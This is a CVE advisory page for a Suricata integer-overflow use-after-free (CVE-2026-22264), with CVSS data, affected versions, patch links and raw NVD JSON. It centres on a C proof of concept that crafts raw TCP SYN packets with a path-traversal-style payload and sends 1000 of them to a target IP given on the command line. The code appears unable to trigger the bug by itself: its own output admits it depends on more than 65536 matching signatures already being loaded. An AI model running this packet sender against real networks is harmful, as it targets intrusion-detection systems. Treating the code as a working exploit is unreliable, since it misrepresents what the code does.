Security Vulnerability Report
CVE-2026-22264 CVSS 7.4 HIGH

CVE-2026-22264

Published: 2026-01-27 19:16:15
Last Modified: 2026-01-29 20:58:58

Description

Suricata is a network IDS, IPS and NSM engine. Prior to version 8.0.3 and 7.0.14, an unsigned integer overflow can lead to a heap use-after-free condition when generating excessive amounts of alerts for a single packet. Versions 8.0.3 and 7.0.14 contain a patch. As a workaround, do not run untrusted rulesets or run with less than 65536 signatures that can match on the same packet.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata < 7.0.14)
cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:* - VULNERABLE (Suricata 8.0.0 to < 8.0.3)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2026-22264 PoC - Suricata Integer Overflow leading to Use-After-Free
// This PoC demonstrates triggering the vulnerability by generating excessive alerts
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

#define MALICIOUS_PAYLOAD "\x47\x45\x54\x20\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x00"

// Builds a minimal IPv4 + TCP packet of `size` bytes into `packet`.
// Note: the IP header addresses are hardcoded; the sendto() destination
// given on the command line is only used for routing.
void generate_malicious_packet(unsigned char *packet, int size) {
    // IP Header
    packet[0] = 0x45;                       // Version 4, IHL 5
    packet[1] = 0x00;                       // DSCP
    packet[2] = (size >> 8) & 0xFF;         // Total length (high byte)
    packet[3] = size & 0xFF;                // Total length (low byte)
    packet[4] = 0x00; packet[5] = 0x01;     // Identification
    packet[6] = 0x40;                       // Flags: Don't Fragment
    packet[7] = 0x00;                       // Fragment Offset
    packet[8] = 64;                         // TTL
    packet[9] = 0x06;                       // Protocol: TCP
    packet[10] = 0x00; packet[11] = 0x00;   // Checksum placeholder (Linux fills it in for IPPROTO_RAW)
    // Source IP: 192.168.1.100
    packet[12] = 192; packet[13] = 168; packet[14] = 1; packet[15] = 100;
    // Dest IP: 192.168.1.1
    packet[16] = 192; packet[17] = 168; packet[18] = 1; packet[19] = 1;

    // TCP Header
    packet[20] = 0x00; packet[21] = 0x50;   // Source Port: 80
    packet[22] = 0x01; packet[23] = 0xBB;   // Dest Port: 443
    packet[24] = 0x00; packet[25] = 0x00; packet[26] = 0x00; packet[27] = 0x01; // Seq
    packet[28] = 0x00; packet[29] = 0x00; packet[30] = 0x00; packet[31] = 0x00; // Ack
    packet[32] = 0x50;                      // Data Offset: 5 words (20 bytes)
    packet[33] = 0x02;                      // Flags: SYN
    packet[34] = 0x00; packet[35] = 0x00;   // Window
    packet[36] = 0x00; packet[37] = 0x00;   // Checksum (left zero, not computed)
    packet[38] = 0x00; packet[39] = 0x00;   // Urgent Pointer

    // Payload - pattern intended to match multiple signatures
    int payload_start = 40;
    int payload_len = (int)strlen(MALICIOUS_PAYLOAD); // 14 bytes; the trailing \x00 terminates the string
    for (int i = 0; i < size - payload_start && i < payload_len; i++) {
        packet[payload_start + i] = MALICIOUS_PAYLOAD[i];
    }
}

int main(int argc, char *argv[]) {
    int sock;
    struct sockaddr_in target;
    unsigned char packet[65536];

    if (argc < 2) {
        printf("Usage: %s <target_ip>\n", argv[0]);
        return 1;
    }
    printf("[*] CVE-2026-22264 PoC - Suricata Integer Overflow\n");
    printf("[*] Target: %s\n", argv[1]);

    // Create raw socket (requires CAP_NET_RAW / root)
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (sock < 0) {
        perror("[!] Socket creation failed");
        return 1;
    }

    memset(&target, 0, sizeof(target));
    target.sin_family = AF_INET;
    target.sin_addr.s_addr = inet_addr(argv[1]);

    // Generate and send malicious packets
    for (int i = 0; i < 1000; i++) {
        memset(packet, 0x41, sizeof(packet)); // Fill with pattern
        generate_malicious_packet(packet, 1500);
        if (sendto(sock, packet, 1500, 0, (struct sockaddr *)&target, sizeof(target)) < 0) {
            perror("[!] Send failed");
        }
        usleep(1000); // Small delay between packets
    }

    printf("[+] Sent %d malicious packets\n", 1000);
    printf("[*] If Suricata has >65536 matching signatures, trigger overflow\n");
    close(sock);
    return 0;
}

References

https://github.com/OISF/suricata/commit/549d7bf60616de8e54686a188196453b5b22f715 (Patch)
https://github.com/OISF/suricata/commit/5789a3d3760dbf33d93fc56c27bd9529e5bdc8f2 (Patch)
https://github.com/OISF/suricata/commit/ac1eb394181530430fb7262969f423a1bf8f209b (Patch)
https://github.com/OISF/suricata/security/advisories/GHSA-mqr8-m3m4-2hw5 (Vendor Advisory)
https://redmine.openinfosecfoundation.org/issues/8190 (Permissions Required)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22264",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-27T19:16:14.640",
    "lastModified": "2026-01-29T20:58:58.080",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Suricata is a network IDS, IPS and NSM engine. Prior to version 8.0.3 and 7.0.14, an unsigned integer overflow can lead to a heap use-after-free condition when generating excessive amounts of alerts for a single packet. Versions 8.0.3 and 7.0.14 contain a patch. As a workaround, do not run untrusted rulesets or run with less than 65536 signatures that can match on the same packet."},
      {"lang": "es", "value": "Suricata es un motor IDS, IPS y NSM de red. Antes de las versiones 8.0.3 y 7.0.14, un desbordamiento de entero sin signo puede conducir a una condición de uso después de liberación en el heap al generar una cantidad excesiva de alertas para un solo paquete. Las versiones 8.0.3 y 7.0.14 contienen un parche. Como solución alternativa, no ejecute conjuntos de reglas no confiables o ejecute con menos de 65536 firmas que puedan coincidir en el mismo paquete."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 5.2
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.0.14", "matchCriteriaId": "5302B0F0-AF2D-4140-BC66-9186EF7E455D"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:oisf:suricata:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.0.3", "matchCriteriaId": "E7DA8362-52A2-4ACC-83F7-CA2E77AE89C6"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/OISF/suricata/commit/549d7bf60616de8e54686a188196453b5b22f715", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/OISF/suricata/commit/5789a3d3760dbf33d93fc56c27bd9529e5bdc8f2", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/OISF/suricata/commit/ac1eb394181530430fb7262969f423a1bf8f209b", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/OISF/suricata/security/advisories/GHSA-mqr8-m3m4-2hw5", "source": "[email protected]", "tags": ["Vendor Advisory"]},
      {"url": "https://redmine.openinfosecfoundation.org/issues/8190", "source": "[email protected]", "tags": ["Permissions Required"]}
    ]
  }
}